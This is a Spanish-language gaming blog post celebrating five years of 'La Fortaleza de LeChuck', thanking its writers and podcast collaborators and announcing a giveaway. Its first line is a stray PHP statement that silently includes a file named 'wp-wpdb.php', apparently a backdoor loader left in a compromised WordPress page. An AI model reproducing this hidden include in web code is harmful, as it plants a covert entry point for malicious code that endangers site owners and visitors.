if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); 5 años de La Fortaleza de LeChuck – La Fortaleza de LeChuck

5 años de La Fortaleza de LeChuck

Hace 5 años, y coincidiendo de forma totalmente anecdótica con el día de los enamorados, Arashi (Elaine) y yo (Guybrush/Museboy) nos embarcamos en la creación de este blog desde la humildad, pretendiendo, simplemente, escribir sobre una de nuestras mayores pasiones en la que coincidimos, que son los videojuegos.

5 años de lafortalezadelechuck

En poco tiempo, varios tripulantes fueron engatusados para formar parte de este barco pirata, que ahora y desde siempre es mirado con recelo y miedo en cada puerto donde hemos decidido repostar Grog. No es fácil contar que llevas 5 años hablando sobre videojuegos, sobretodo si no ganas dinero con ello, sea escribiendo como en un podcast o en vídeos en YouTube, pero la idea de este blog siempre ha sido el de compartir nuestra opinión sobre el entretenimiento que llena nuestro tiempo libre, que son los videojuegos.

Formar parte de este blog también ha causado que en mi vida profesional me haya dedicado a escribir por un tiempo, y también lo que hago ahora para ganarme la vida es, sin duda, producto de esta página de videojuegos, por lo que es imposible abandonar el barco y seguiremos remando para ver donde nos llevan las corrientes y mareas.

[Tweet «La Fortaleza de LeChuck cumple 5 años ¡Felicidades!»]

Agradezco enormemente a todos los tripulantes que han pasado por aquí y han dejado sus artículos, que todavía hoy siguen siendo visitados por muchas personas. Os lo agradezco de corazón a los que se fueron, a los que están y llegarán, a todos. En especial a los que estuvieron y siguen de una forma u otra compartiendo, como el gran Wally, Hekothedolphin, o Stan (Musekaji) que siguen dando candela cada 15 días en el podcast y escribiendo de vez en cuando, haciendo un gran esfuerzo y hueco en sus ocupadas agendas. También a los que a día de hoy reman mucho en el blog y en el podcast, como el gran Oplatan al que apreciamos y agradecemos mucho su puntualidad y buen hacer. También agradecer a actuales colaboradores como HJaltey, Juansas y RazorKaen que van haciendo análisis y artículos para la fortaleza de la misma forma desinteresada que no aportan más que valor al blog ¡Gracias!.

Muchos de estos colaboradores son grandes amistades, y probablemente, los demás lo serán, pero agradecemos a todos los que han pasado por aquí y les felicitamos por formar parte de estos 5 años, ya que habría sido imposible el llegar a buen puerto sin ellos. Estos son, a parte de los ya comentados y actuales piratones, Cara limón, Otis, Capitán Smirk, Largo LaGrande, Herman Toothroot,  Daiichi, Iván de Hypernet, Marxianna y Ocriver, y colaboradores eventuales en el podcast, como Jefelín, Zeratul, Grock y Sylar (Creo que no me dejo a nadie).

Por nuestra parte, la idea sigue siendo compartir nuestra pasión videojueguil con análisis, artículos de opinión y curiosidades en el blog, con el podcast quincenal en Ivoox y iTunes, con algún vídeo de vez en cuando en YouTube (Incluyendo a nuestra estrella mediática Lady Elisabeth), alguna noticia que otra en Twitter y Facebook y por supuesto, con LeChuck (que desde lo más profundo del Caribe, os vigila ¡Pringaos!). Gracias por estar al otro lado y disfruten lo asaltado! ¡Esto es el Big Whoop! ¡Prometemos más y mejor!

 

LeChuck-3

PD: Os recordamos que celebramos estos 5 años regalando un pack de juegos de aventuras, estáis a tiempo de participar aquí.

Publicada el
Categorizado como Blog

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario